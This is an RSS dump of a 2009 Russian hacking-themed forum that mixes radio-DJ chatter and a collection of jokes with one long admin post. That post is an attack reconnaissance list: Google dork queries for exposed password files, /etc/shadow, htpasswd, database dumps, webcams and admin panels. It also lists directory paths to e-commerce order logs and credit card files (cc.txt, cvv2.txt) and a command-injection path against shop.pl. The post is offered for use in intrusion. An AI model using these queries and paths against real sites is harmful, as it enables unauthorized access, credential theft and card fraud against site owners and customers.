http://sliphot.bbon.ru/ =®=©=&gt;&#950;†ЕРРИ†ОРИЯ ВЗJIОМА&#950;&lt;=©=®=Поздравления,программирование, стихи,анекдоты. ru-ru Sat, 02 May 2009 22:44:19 +0400 MyBB/mybb.ru http://sliphot.bbon.ru/viewtopic.php?pid=224#p224 <p>dj pantera самая зажигательная !!!!!!!! :cool:&#160; :cool:&#160; :cool:</p> mybb@mybb.ru (tybaretka) Sat, 02 May 2009 22:44:19 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=224#p224 http://sliphot.bbon.ru/viewtopic.php?pid=223#p223 <p>ВСе ништяк=)</p> mybb@mybb.ru (Александр) Sat, 02 May 2009 22:41:37 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=223#p223 http://sliphot.bbon.ru/viewtopic.php?pid=217#p217 <p>Как Вы считаете?</p> mybb@mybb.ru (admin) Fri, 01 May 2009 01:27:18 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=217#p217 http://sliphot.bbon.ru/viewtopic.php?pid=216#p216 <p>Оставляйте свои комментарии по поводу ведения эфиров этого Ди-Джея. Высказывайте своё мнение. <br />P.S. Вам за это ничего не будет, даже если Ваше мнение не очень хорошее</p> mybb@mybb.ru (admin) Fri, 01 May 2009 01:21:30 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=216#p216 http://sliphot.bbon.ru/viewtopic.php?pid=215#p215 <p>Оставляйте свои комментарии по поводу ведения эфиров этого Ди-Джея. Высказывайте своё мнение. <br />P.S. Вам за это ничего не будет, даже если Ваше мнение не очень хорошее</p> mybb@mybb.ru (admin) Fri, 01 May 2009 01:20:23 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=215#p215 http://sliphot.bbon.ru/viewtopic.php?pid=214#p214 <p><span style="color: red"><span style="font-size: 14px">[size=14]Нет, нам нужны ди-джеи только на утренний эфир!</span>[/size]</span></p> mybb@mybb.ru (admin) Fri, 01 May 2009 01:15:20 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=214#p214 http://sliphot.bbon.ru/viewtopic.php?pid=202#p202 <p>Radio Muzzon-лучшее радио в интернете!спасибо всем,кто создал это радио!</p> mybb@mybb.ru (Dj Pantera) Wed, 22 Apr 2009 14:43:49 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=202#p202 http://sliphot.bbon.ru/viewtopic.php?pid=194#p194 <p><span style="color: lime">&quot;access denied for user&quot; &quot;using password&quot; <br />&quot;Chatologica MetaSearch&quot; &quot;stack tracking:&quot; <br />&quot;Index of /backup&quot; <br />&quot;ORA-00921: unexpected end of SQL command&quot; <br />&quot;parent directory &quot; /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />&quot;parent directory &quot; DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />&quot;parent directory &quot; Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />&quot;parent directory &quot; MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />&quot;parent directory &quot; Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />&quot;parent directory &quot;Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums <br />?intitle:index.of? mp3 name <br />allintitle:&quot;Network Camera NetworkCamera&quot; <br />allinurl: admin mdb <br />allinurl:auth_user_file.txt <br />intitle:&quot;live view&quot; intitle:axis <br />intitle:axis intitle:&quot;video server&quot; <br />intitle:liveapplet <br />inurl:&quot;ViewerFrame?Mode=&quot; <br />inurl:axis-cgi/jpg <br />inurl:axis-cgi/mjpg (motion-JPEG) <br />inurl:passlist.txt <br />inurl:view/index.shtml <br />inurl:view/indexFrame.shtml <br />inurl:view/view.shtml <br />inurl:ViewerFrame?Mode=Refresh <br />liveapplet <br />!Host=*.* intext:enc_UserPassword=* ext:pcf <br />&quot; -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) <br />&quot;A syntax error has occurred&quot; filetype:ihtml <br />&quot;About Mac OS Personal Web Sharing&quot; <br />&quot;access denied for user&quot; &quot;using password&quot; <br />&quot;allow_call_time_pass_reference&quot; &quot;PATH_INFO&quot; <br />&quot;An illegal character has been found in the statement&quot; -&quot;previous message&quot; <br />&quot;ASP.NET_SessionId&quot; &quot;data source=&quot; <br />&quot;AutoCreate=TRUE password=*&quot; <br />&quot;Can't connect to local&quot; intitle:warning <br />&quot;Certificate Practice Statement&quot; inurl:(PDF | DOC) <br />&quot;Chatologica MetaSearch&quot; &quot;stack tracking&quot; <br />&quot;Copyright (c) Tektronix, Inc.&quot; &quot;printer status&quot; <br />&quot;detected an internal error [IBM][CLI Driver][DB2/6000]&quot; <br />&quot;Dumping data for table&quot; <br />&quot;Error Diagnostic Information&quot; intitle:&quot;Error Occurred While&quot; <br />&quot;error found handling the request&quot; cocoon filetype:xml <br />&quot;Fatal error: Call to undefined function&quot; -reply -the -next </p> <p>&quot;Generated by phpSystem&quot; <br />&quot;generated by wwwstat&quot; <br />&quot;Host Vulnerability Summary Report&quot; <br />&quot;HTTP_FROM=googlebot&quot; googlebot.com &quot;Server_Software=&quot; <br />&quot;IMail Server Web Messaging&quot; intitle:login <br />&quot;Incorrect syntax near&quot; <br />&quot;Index of /&quot; +.htaccess <br />&quot;Index of /&quot; +passwd <br />&quot;Index of /&quot; +password.txt <br />&quot;Index of /admin&quot; <br />&quot;Index of /mail&quot; <br />&quot;Index Of /network&quot; &quot;last modified&quot; <br />&quot;Index of /password&quot; <br />&quot;index of /private&quot; site:mil <br />&quot;index of /private&quot; -site:net -site:com -site:org <br />&quot;Index of&quot; / &quot;chat/logs&quot; <br />&quot;index of/&quot; &quot;ws_ftp.ini&quot; &quot;parent directory&quot; <br />&quot;Installed Objects Scanner&quot; inurl:default.asp <br />&quot;Internal Server Error&quot; &quot;server at&quot; <br />&quot;liveice configuration file&quot; ext:cfg <br />&quot;Login - Sun Cobalt RaQ&quot; <br />&quot;Mecury Version&quot; &quot;Infastructure Group&quot; <br />&quot;Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)&quot; ext:log <br />&quot;More Info about MetaCart Free&quot; <br />&quot;Most Submitted Forms and Scripts&quot; &quot;this section&quot; <br />&quot;mysql dump&quot; filetype:sql <br />&quot;mySQL error with query&quot; <br />&quot;Network Vulnerability Assessment Report&quot; ???? pc007.com <br />&quot;not for distribution&quot; confidential <br />&quot;ORA-00921: unexpected end of SQL command&quot; <br />&quot;ORA-00933: SQL command not properly ended&quot; <br />&quot;ORA-00936: missing expression&quot; <br />&quot;pcANYWHERE EXPRESS Java Client&quot; <br />&quot;phone * * *&quot; &quot;address *&quot; &quot;e-mail&quot; intitle:&quot;curriculum vitae&quot; <br />&quot;phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot; <br />&quot;phpMyAdmin MySQL-Dump&quot; filetype:txt <br />&quot;phpMyAdmin&quot; &quot;running on&quot; inurl:&quot;main.php&quot; <br />&quot;PostgreSQL query failed: ERROR: parser: parse error&quot; <br />&quot;Powered by mnoGoSearch - free web search engine software&quot; <br />&quot;powered by openbsd&quot; +&quot;powered by apache&quot; <br />&quot;Powered by UebiMiau&quot; -site:sourceforge.net <br />&quot;produced by getstats&quot; <br />&quot;Request Details&quot; &quot;Control Tree&quot; &quot;Server Variables&quot; <br />&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt <br />&quot;Running in Child mode&quot; <br />&quot;sets mode: +k&quot; <br />&quot;sets mode: +p&quot; <br />&quot;sets mode: +s&quot; <br />&quot;Supplied argument is not a valid MySQL result resource&quot; <br />&quot;Supplied argument is not a valid PostgreSQL result&quot; <br />&quot;Thank you for your order&quot; +receipt <br />&quot;This is a Shareaza Node&quot; <br />&quot;This report was generated by WebLog&quot; </p> <p>&quot;This summary was generated by wwwstat&quot; <br />&quot;VNC Desktop&quot; inurl:5800 <br />&quot;Warning: Cannot modify header information - headers already sent&quot; <br />&quot;Web File Browser&quot; &quot;Use regular expression&quot; <br />&quot;xampp/phpinfo <br />&quot;You have an error in your SQL syntax near&quot; <br />&quot;Your password is * Remember this for later use&quot; <br />aboutprinter.shtml <br />allintitle: &quot;index of/admin&quot; <br />allintitle: &quot;index of/root&quot; <br />allintitle: restricted filetype :mail <br />allintitle: restricted filetype:doc site:gov <br />allintitle: sensitive filetype:doc <br />allintitle:\&quot;Test page for Apache Installation\&quot; <br />allintitle:admin.php <br />allinurl:&quot;/*/_vti_pvt/&quot; | allinurl:&quot;/*/_vti_cnf/&quot; <br />allinurl:admin mdb <br />allinurl:auth_user_file.txt <br />allinurl:servlet/SnoopServlet <br />An unexpected token &quot;END-OF-STATEMENT&quot; was found <br />camera linksys inurl:main.cgi <br />Canon Webview netcams <br />Comersus.mdb database <br />confidential site:mil <br />ConnectionTest.java filetype:html <br />data filetype:mdb -site:gov -site:mil <br />eggdrop filetype:user user <br />ext:conf NoCatAuth -cvs <br />ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; <br />ext:txt inurl:unattend.txt <br />filetype:ASP ASP <br />filetype:ASPX ASPX <br />filetype:BML BML <br />filetype:cfg ks intext:rootpw -sample -test -howto <br />filetype:cfm &quot;cfapplication name&quot; password <br />filetype:CFM CFM <br />filetype:CGI CGI <br />filetype:conf inurl:psybnc.conf &quot;USER.PASS=&quot; <br />filetype:dat &quot;password.dat <br />filetype:DIFF DIFF <br />filetype:DLL DLL <br />filetype:DOC DOC <br />filetype:FCGI FCGI <br />filetype:HTM HTM <br />filetype:HTML HTML <br />filetype:inf sysprep <br />filetype:JHTML JHTML <br />filetype:JSP JSP <br />filetype:log inurl:password.log <br />filetype:MV MV <br />filetype:pdf &quot;Assessment Report&quot; nessus <br />filetype:PDF PDF <br />filetype:PHP PHP <br />filetype:PHP3 PHP3 <br />filetype:PHP4 PHP4 <br />filetype:PHTML PHTML <br />filetype:PL PL <br />filetype:PPT PPT <br />filetype:PS PS <br />filetype:SHTML SHTML <br />filetype:STM STM <br />filetype:SWF SWF <br />filetype:TXT TXT <br />filetype:XLS XLS <br />htpasswd / htpasswd.bak <br />Index of phpMyAdmin <br />index of: intext:Gallery in Configuration mode <br />index.of passlist <br />intext:&quot;&quot;BiTBOARD v2.0&quot; BiTSHiFTERS Bulletin Board&quot; <br />intext:&quot;d.aspx?id&quot; || inurl:&quot;d.aspx?id&quot; <br />intext:&quot;enable secret 5 $&quot; <br />intext:&quot;powered by Web Wiz Journal&quot; <br />intext:&quot;SteamUserPassphrase=&quot; intext:&quot;SteamAppUser=&quot; -&quot;username&quot; -&quot;user&quot; <br />intitle:&quot;--- VIDEO WEB SERVER ---&quot; intext:&quot;Video Web Server&quot; &quot;Any time &amp; Any where&quot; username password <br />intitle:&quot;500 Internal Server Error&quot; &quot;server at&quot; <br />intitle:&quot;actiontec&quot; main setup status &quot;Copyright 2001 Actiontec Electronics Inc&quot; <br />intitle:&quot;Browser Launch Page&quot; <br />intitle:&quot;DocuShare&quot; inurl:&quot;docushare/dsweb/&quot; -faq -gov -edu <br />intitle:&quot;EverFocus.EDSR.app&lt;-b&gt;let&quot; <br />intitle:&quot;Index of&quot; &quot;.htpasswd&quot; &quot;htgroup&quot; -intitle:&quot;dist&quot; -apache -htpasswd.c <br />intitle:&quot;Index of&quot; .bash_history <br />intitle:&quot;Index of&quot; .mysql_history <br />intitle:&quot;Index of&quot; .mysql_history <br />intitle:&quot;Index of&quot; .sh_history <br />intitle:&quot;Index of&quot; cfide <br />intitle:&quot;index of&quot; etc/shadow <br />intitle:&quot;index of&quot; htpasswd <br />intitle:&quot;index of&quot; intext:globals.inc <br />intitle:&quot;index of&quot; master.passwd 007???? <br />intitle:&quot;index of&quot; members OR accounts <br />intitle:&quot;index of&quot; passwd <br />intitle:&quot;Index of&quot; passwords modified <br />intitle:&quot;index of&quot; people.lst <br />intitle:&quot;index of&quot; pwd.db <br />intitle:&quot;Index of&quot; pwd.db <br />intitle:&quot;index of&quot; spwd <br />intitle:&quot;Index of&quot; spwd.db passwd -pam.conf <br />intitle:&quot;index of&quot; user_carts OR user_cart <br />intitle:&quot;Index of..etc&quot; passwd <br />intitle:&quot;iVISTA.Main.Page&quot; <br />intitle:&quot;network administration&quot; inurl:&quot;nic&quot; <br />intitle:&quot;OfficeConnect Cable/DSL Gateway&quot; intext:&quot;Checking your browser&quot; <br />intitle:&quot;remote assessment&quot; OpenAanval Console <br />intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb <br />intitle:&quot;switch login&quot; &quot;IBM Fast Ethernet Desktop&quot; <br />intitle:&quot;SWW link&quot; &quot;Please wait.....&quot; <br />intitle:&quot;teamspeak server-administration <br />intitle:&quot;TUTOS Login&quot; <br />intitle:&quot;VMware Management Interface:&quot; inurl:&quot;vmware/en/&quot; <br />intitle:&quot;Welcome to the Advanced Extranet Server, ADVX!&quot; <br />intitle:&quot;Welcome to Windows 2000 Internet Services&quot; <br />intitle:&quot;Connection Status&quot; intext:&quot;Current login&quot; <br />intitle:&quot;inc. vpn 3000 concentrator&quot; intitle:asterisk.management.portal web-access <br />intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com <br />intitle:index.of administrators.pwd <br />intitle:index.of cgiirc.config <br />intitle:Index.of etc shadow site:passwd <br />intitle:index.of intext:&quot;secring.skr&quot;|&quot;secring.pgp&quot;|&quot;secring.bak&quot; <br />intitle:index.of master.passwd <br />intitle:index.of passwd passwd.bak <br />intitle:index.of people.lst <br />intitle:index.of trillian.ini <br />intitle:Novell intitle:WebAccess &quot;Copyright &amp;# Novell, Inc&quot; <br />intitle:opengroupware.org &quot;resistance is obsolete&quot; &quot;Report Bugs&quot; &quot;Username&quot; &quot;password&quot; <br />intitle:open-xchange inurl:login.pl <br />inurl:&quot;:10000&quot; intext:webmin <br />inurl:&quot;8003/Display?what=&quot; <br />inurl:&quot;auth_user_file.txt&quot; <br />inurl:&quot;GRC.DAT&quot; intext:&quot;password&quot; <br />inurl:&quot;printer/main.html&quot; intext:&quot;settings&quot; <br />inurl:&quot;slapd.conf&quot; intext:&quot;credentials&quot; -manpage -&quot;Manual Page&quot; -man: -sample <br />inurl:&quot;slapd.conf&quot; intext:&quot;rootpw&quot; -manpage -&quot;Manual Page&quot; -man: -sample <br />inurl:&quot;ViewerFrame?Mode=&quot; <br />inurl:&quot;wvdial.conf&quot; intext:&quot;password&quot; ????007???? <br />inurl:&quot;wwwroot/ <br />inurl:/Citrix/Nfuse17/ <br />inurl:/db/main.mdb <br />inurl:/wwwboard <br />inurl:access <br />inurl:admin filetype:db <br />inurl:asp <br />inurl:buy <br />inurl:ccbill filetype:log <br />inurl:cgi <br />inurl:cgiirc.config <br />inurl:chap-secrets -cvs <br />inurl:config.php dbuname dbpass <br />inurl:data <br />inurl:default.asp intitle:&quot;WebCommander&quot; <br />inurl:download <br />inurl:file <br />inurl:filezilla.xml -cvs <br />inurl:forum <br />inurl:home <br />inurl:hp/device/this.LCDispatcher <br />inurl:html <br />inurl:iisadmin <br />inurl:inc <br />inurl:info <br />inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man <br />inurl:list <br />inurl:login filetype:swf swf <br />inurl:mail <br />inurl:midicart.mdb <br />inurl:names.nsf?opendatabase <br />inurl:new <br />inurl:nuke filetype:sql <br />inurl:order <br />inurl:ospfd.conf intext:password -sample -test -tutorial -download <br />inurl:pages <br />inurl:pap-secrets -cvs <br />inurl:passlist.txt <br />inurl:passwd filetype:txt <br />inurl:Proxy.txt <br />inurl:public <br />inurl:search <br />inurl:secring ext:skr | ext:pgp | ext:bak <br />inurl:shop <br />inurl:shopdbtest.asp <br />inurl:software <br />inurl:support <br />inurl:user <br />inurl:vtund.conf intext:pass -cvs s <br />inurl:web <br />inurl:zebra.conf intext:password -sample -test -tutorial -download <br />LeapFTP intitle:&quot;index.of./&quot; sites.ini modified <br />POWERED BY HIT JAMMER 1.0! <br />signin filetype:url&#160; <br />site:ups.com intitle:&quot;Ups Package tracking&quot; intext:&quot;1Z ### ### ## #### ### #&quot; <br />top secret site:mil <br />Ultima Online loginservers <br />VP-ASP Shop Administrators only <br />XAMPP &quot;inurl:xampp/index<br /><br /><br /><br /><br /><br /></p> <p>allinurl: &quot;proxylist.txt&quot;<br />allinurl: &quot;proxy.txt&quot;<br />&quot;index of/root&quot;<br />&quot;auth_user_file.txt&quot;<br />&quot;index of/root&quot;<br />&quot;Index of /admin&quot;<br />&quot;Index of /password&quot;<br />&quot;Index of /mail&quot;<br />&quot;Index of /&quot; +passwd<br />&quot;Index of /&quot; +password.txt<br />&quot;Index of /&quot; +.htaccess<br />index of ftp +.mdb allinurl:/cgi-bin/ +mailto<br />administrators.pwd.index<br />authors.pwd.index<br />service.pwd.index<br />filetype:config web<br />gobal.asax index<br />allintitle: &quot;index of/admin&quot;<br />allintitle: &quot;index of/root&quot;<br />allintitle: sensitive filetype oc<br />allintitle: restricted filetype :mail<br />allintitle: restricted filetype oc site:gov<br />for IIS server exlpoit<br />allinurl: winnt/system32/<br />and u’ll get many IIS server exploitsъ<br />intitle:r57shell<br />intitle:&quot;Index of&quot; .sh_history<br />intitle:&quot;Index of&quot; .bash_history<br />intitle:&quot;index of&quot; passwd<br />intitle:&quot;index of&quot; people.lst<br />intitle:&quot;index of&quot; pwd.db<br />intitle:&quot;index of&quot; etc/shadow<br />intitle:&quot;index of&quot; spwd<br />intitle:&quot;index of&quot; master.passwd<br />intitle:&quot;index of&quot; htpasswd<br />intitle:&quot;index of&quot; members OR accounts<br />intitle:&quot;index of&quot; user_carts OR user_cart<br />_vti_inf.html<br />service.pwd<br />users.pwd<br />authors.pwd<br />administrators.pwd<br />shtml.dll<br />shtml.exe<br />fpcount.exe<br />default.asp<br />showcode.asp<br />sendmail.cfm<br />getFile.cfm<br />imagemap.exe<br />test.bat<br />msadcs.dll<br />htimage.exe<br />counter.exe<br />browser.inc<br />hello.bat<br />default.asp\<br />dvwssr.dll<br />cart32.exe<br />add.exe<br />index.jsp<br />SessionServlet<br />glimpse<br />man.sh<br />AT-admin.cgi<br />AT-generate.cgi<br />inurl:/adpassword.txt<br />inurl:admin.dat<br />and even for shop sites:<br />inurl:/shop/db/<br />intitle:&quot;index of/ shop&quot; +db<br />intitle:&quot;index of/&quot; +shopping_cart</p> <p>Цитата:<br />&quot;Index of /admin&quot;<br />&quot;Index of /password&quot;<br />&quot;Index of /mail&quot;<br />&quot;Index of /&quot; +passwd<br />&quot;Index of /&quot; +password.txt<br />&quot;Index of /&quot; +.htaccess<br />index of ftp +.mdb allinurl:/cgi-bin/ +mailto</p> <p>administrators.pwd.index<br />authors.pwd.index<br />service.pwd.index<br />filetype:config web<br />gobal.asax index</p> <p>allintitle: &quot;index of/admin&quot;<br />allintitle: &quot;index of/root&quot;<br />allintitle: sensitive filetype:doc<br />allintitle: restricted filetype :mail<br />allintitle: restricted filetype:doc site:gov</p> <p>inurlasswd filetype:txt<br />inurl:admin filetype:db<br />inurl:iisadmin<br />inurl:&quot;auth_user_file.txt&quot;<br />inurl:&quot;wwwroot/*.&quot;</p> <p>top secret site:mil<br />confidential site:mil</p> <p>allinurl: winnt/system32/ (get cmd.exe)<br />allinurl:/bash_history</p> <p>intitle:&quot;Index of&quot; .sh_history<br />intitle:&quot;Index of&quot; .bash_history<br />intitle:&quot;index of&quot; passwd<br />intitle:&quot;index of&quot; people.lst<br />intitle:&quot;index of&quot; pwd.db<br />intitle:&quot;index of&quot; etc/shadow<br />intitle:&quot;index of&quot; spwd<br />intitle:&quot;index of&quot; master.passwd<br />intitle:&quot;index of&quot; htpasswd<br />intitle:&quot;index of&quot; members OR accounts<br />intitle:&quot;index of&quot; user_carts OR user_cart</p> <p>Многие админы оставляют открытыми такие директории:<br />Цитата:<br />/orders<br />/Order<br />/Orders<br />/order<br />/config<br />/Admin_files<br />/mall_log_files<br />/PDG_Cart<br />PDG_Cart/order.log<br />PDG_Cart/shopper.conf<br />/pw<br />/store/customers<br />/store/temp_customers<br />/WebShop<br />/webshop<br />/WebShop/templates<br />/WebShop/logs<br />/cgi/PDG_Cart/order.log<br />/PDG_Cart/authorizenets.txt<br />/cgi-bin/PDG_Cart/mc.txt<br />/PDG/order.txt<br />/cgi-bin/PDG_cart/card.txt<br />/PDG_Cart/shopper.conf<br />/php/mlog.phtml<br />/php/mylog.phtml<br />/webcart/carts<br />/cgi-bin/orders.txt<br />/WebShop/logs<br />/cgi-bin/AnyForm2<br />/cgi-bin/mc.txt<br />/ccbill/secure/ccbill.log<br />/cgi-bin/orders/mc.txt<br />/WebCart/orders.txt<br />/cgi-bin/orders/cc.txt<br />/cvv2.txt<br />/cgi-bin/orderlog.txt<br />/WebShop/logs<br />/orderb/shop.mdb<br />/_private/shopping_cart.mdb<br />/scripts/iisadmin/tools/mkilog.exe<br />/cool-logs/mylog.html<br />/cool-logs/mlog.html<br />/easylog/easylog.html<br />/HyperStat/stat_what.log<br />/mall_log_files/<br />/scripts/weblog<br />/super_stats/access_logs<br />/trafficlog<br />/wwwlog<br />/Admin_files/order.log<br />/bin/orders/orders.txt<br />/cgi/orders/orders.txt<br />/cgi-bin/orders/orders.txt<br />/cgi-sys/orders/orders.txt<br />/cgi-local/orders/orders.txt<br />/htbin/orders/orders.txt<br />/cgibin/orders/orders.txt<br />/cgis/orders/orders.txt<br />/scripts/orders/orders.txt<br />/cgi-win/orders/orders.txt<br />/bin/pagelog.cgi<br />/cgi/pagelog.cgi<br />/cgi-bin/pagelog.cgi<br />/cgi-sys/pagelog.cgi<br />/cgi-local/pagelog.cgi<br />/cgibin/pagelog.cgi<br />/cgis/pagelog.cgi<br />/scripts/pagelog.cgi<br />/cgi-win/pagelog.cgi<br />/bin/DCShop/auth_data/auth_user_file.txt<br />/cgi/DCShop/auth_data/auth_user_file.txt<br />/cgi-bin/DCShop/auth_data/auth_user_file.txt<br />/cgi-sys/DCShop/auth_data/auth_user_file.txt<br />/cgi-local/DCShop/auth_data/auth_user_file.txt<br />/htbin/DCShop/auth_data/auth_user_file.txt<br />/cgibin/DCShop/auth_data/auth_user_file.txt<br />/cgis/DCShop/auth_data/auth_user_file.txt<br />/scripts/DCShop/auth_data/auth_user_file.txt<br />/cgi-win/DCShop/auth_data/auth_user_file.txt<br />/bin/DCShop/orders/orders.txt<br />/cgi/DCShop/orders/orders.txt<br />/cgi-bin/DCShop/orders/orders.txt<br />/cgi-sys/DCShop/orders/orders.txt<br />/cgi-local/DCShop/orders/orders.txt<br />/htbin/DCShop/orders/orders.txt<br />/cgibin/DCShop/orders/orders.txt<br />/cgis/DCShop/orders/orders.txt<br />/scripts/DCShop/orders/orders.txt<br />/cgi-win/DCShop/orders/orders.txt<br />/dc/auth_data/auth_user_file.txt<br />/dcshop/orders/orders.txt<br />/dcshop/auth_data/auth_user_file.txt<br />/dc/orders/orders.txt<br />/orders/checks.txt<br />/orders/mountain.cfg<br />/cgi-bin/shopper.cgi&amp;TEMPLATE=ORDER.LOG<br />/webcart/carts<br />/webcart-lite/orders/import.txt<br />/webcart/config<br />/webcart/config/clients.txt<br />/webcart/orders<br />/webcart/orders/import.txt<br />/WebShop/logs/cc.txt<br />/WebShop/templates/cc.txt<br />/bin/shop/auth_data/auth_user_file.txt<br />/cgi/shop/auth_data/auth_user_file.txt<br />/cgi-bin/shop/auth_data/auth_user_file.txt<br />/cgi-sys/shop/auth_data/auth_user_file.txt<br />/cgi-local/shop/auth_data/auth_user_file.txt<br />/htbin/shop/auth_data/auth_user_file.txt<br />/cgibin/shop/auth_data/auth_user_file.txt<br />/cgis/shop/auth_data/auth_user_file.txt<br />/scripts/shop/auth_data/auth_user_file.txt<br />/cgi-win/shop/auth_data/auth_user_file.txt<br />/bin/shop/orders/orders.txt<br />/cgi/shop/orders/orders.txt<br />/cgi-bin/shop/orders/orders.txt<br />/cgi-sys/shop/orders/orders.txt<br />/cgi-local/shop/orders/orders.txt<br />/htbin/shop/orders/orders.txt<br />/cgibin/shop/orders/orders.txt<br />/cgis/shop/orders/orders.txt<br />/scripts/shop/orders/orders.txt<br />/cgi-win/shop/orders/orders.txt<br />/bin/shop.pl/page=;cat%20shop.pl<br />/cgi/shop.pl/page=;cat%20shop.pl<br />/cgi-bin/shop.pl/page=;cat%20shop.pl<br />/cgi-sys/shop.pl/page=;cat%20shop.pl<br />/cgi-local/shop.pl/page=;cat%20shop.pl<br />/htbin/shop.pl/page=;cat%20shop.pl<br />/cgibin/shop.pl/page=;cat%20shop.pl<br />/cgis/shop.pl/page=;cat%20shop.pl<br />/scripts/shop.pl/page=;cat%20shop.pl<br />/cgi-win/shop.pl/page=;cat%20shop.pl<br />/bin/cart.pl<br />/cgi/cart.pl<br />/cgi-bin/cart.pl<br />/cgi-sys/cart.pl<br />/cgi-local/cart.pl<br />/htbin/cart.pl<br />/cgibin/cart.pl<br />/scripts/cart.pl<br />/cgi-win/cart.pl<br />/cgis/cart.pl<br />/bin/cart.pl<br />/cgi/cart.pl<br />/cgi-bin/cart.pl<br />/cgi-sys/cart.pl<br />/cgi-local/cart.pl<br />/htbin/cart.pl<br />/cgibin/cart.pl<br />/cgis/cart.pl<br />/scripts/cart.pl<br />/cgi-win/cart.pl<br />/bin/cart32.exe<br />/cgi/cart32.exe<br />/cgi-bin/cart32.exe<br />/cgi-sys/cart32.exe<br />/cgi-local/cart32.exe<br />/htbin/cart32.exe<br />/cgibin/cart32.exe<br />/cgis/cart32.exe<br />/scripts/cart32.exe<br />/cgi-win/cart32.exe<br />/cgi-bin/www-sql;;;<br />/server%20logfile;;;<br />/cgi-bin/pdg_cart/order.log<br />/cgi-bin/shopper.exe?search<br />/orders/order.log<br />/orders/import.txt<br />/orders/checks.txt<br />/orders/orders.txt<br />/Orders/order.log<br />/order/order.log<br />/WebShop/logs/ck.log<br />/WebShop/logs/cc.txt<br />/WebShop/templates/cc.txt<br />/_private/orders.txt</p> <p>в<br />этих директориях мы за частую можем найти такие файлы как</p> <p>Цитата:<br />orders.txt<br />order.txt<br />import.txt<br />checks.txt<br />order_log<br />order.log<br />orders.log<br />orders_log<br />log_order<br />log_orders<br />temp_order<br />temp_orders<br />order_temp<br />robots.txt<br />admin.mdb<br />user_file.txt</span></p> mybb@mybb.ru (admin) Tue, 21 Apr 2009 12:27:14 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=194#p194 http://sliphot.bbon.ru/viewtopic.php?pid=186#p186 <p>АНЕКДОТЫ<br />***<br />В исполком пришла жалоба: &quot;Напротив моего окна женская баня. Мне все видно и это отвлекает меня и вообще действует на мой моральный облик. Прошу предоставить мне новую квартиру&quot;.<br />Приехала комиссия, смотрят в окно.<br />- Ну и что? Ничего не видно!<br />- А вы на шкаф залезьте!<br />- Ну, залез, - говорит представитель, - все равно не видно!<br />- Двигайтесь левее...<br />- Все равно не видно!<br />- Еще левее!!!<br />Тут представитель двигается и падает с края шкафа.<br />- Вот видите! А я так целый день.</p> <p>- Алло, это ты, моя лягушечка?<br />- Нет! - ответил отец. - Это говорит владелец пруда.</p> <p>Объявление: &quot;Кто нашел оставленную в раздевалке сумку с документами и деньгами, просьба ее вернуть. Вознаграждение вы уже получили!&quot;.</p> <p>- Алло! Это номер 123-45-67?<br />- (сонным голосом.) Да...<br />- Ой, извините, я ошиблась номером...</p> <p>В третьем часу ночи. Телефонный звонок:<br />- Алло! Вы, наверное, уже спали?<br />- Конечно, спал!<br />- Тогда извините, я перезвоню утром.</p> <p>- Алло! Это телефон 493-23-41?<br />- Нет, это телефон 493-23-42.<br />- Все равно рядом - Васю позови!</p> <p>У мужика в квартире забился унитаз. Он вызвал сантехника. Приходит здоровенный амбал. Выдернул трубу, выдохнул и всосал. Ничего нет. Всосал еще раз - опять ничего. Всосал сильнее. Раз, выплюнул мужика:<br />- Вот причина вашей аварии!<br />- Я - не причина! Я живу этажом ниже!</p> <p>Одного лодыря спросили:<br />- Почему ты колешь дрова сидя?<br />- А я уже пробовал лежа, неудобно.</p> <p>Организовалась партия пофигистов. Набежали корреспонденты, начали вопросы задавать.<br />- Вот у вас партия называется пофигисты, так у вас наверно и девиз какой-нибудь есть?<br />- Да, &quot;ВСЕ ПО ФИГУ!&quot;<br />- Как, и законы, и нравственные устои, и мнения других людей?<br />- А по фигу.<br />- А как вы к женщинам относитесь? <br />- Ну, это не по фигу.<br />- Но ведь это идет в разрез с вашим девизом?<br />- А по фигу.</p> <p>- Алло, это 48-48-48?<br />- Да!<br />- А вы телефон поменять не могли бы? Запоминается трудно!</p> <p>- Скажите, вы, случайно, не из Москвы?<br />- Нет.<br />- И не знали моей бабушки?<br />- Нет, а что?<br />- Просто вы рассказываете анекдоты, которые я слышал от неё пятьдесят лет назад.</p> <p>- Официант, почему пельмени холодные?<br />- Так ведь они сибирские.</p> <p>- Здравствуйте, в офисе сейчас никого нет. С вами говорит автоответчик. Оставьте после гудка ваше сообщение. Ту-ту!<br />- Здравствуйте, так как в офисе сейчас никого нет, с вами говорит автодозвонщик... Ту-ту!</p> <p>Идут по улице хиппи и панк.<br />- А что это у вас, у хиппи, все постоянно друг друга ругают?<br />- Как это?<br />- Ну вот, например &quot;заинька&quot; друг друга называете.<br />- Ну, ведь &quot;заинька&quot; - это такое мягкое, теплое, с ушками...<br />- Я и говорю - падла ушастая.</p> <p>Встречаются торопыга и тормоз. Торопыга:<br />- Ты слышал новый анекдот? Приходит один людоед к другому, и плачет: <br />&quot;Я свою жену съел!&quot; - а тот ему: &quot;Не горюй, у тебя еще две есть!&quot; Ха-ха-ха-ха!<br />- Нет, не слышал. Расскажи.</p> <p>- Официант, бифштекс очень горячий!<br />- Так подуйте на него, сэр!<br />- Я пробовал, но он все время улетает!</p> <p>- Алло, это 143-26-12?<br />- Нет...<br />- А зачем тогда трубку 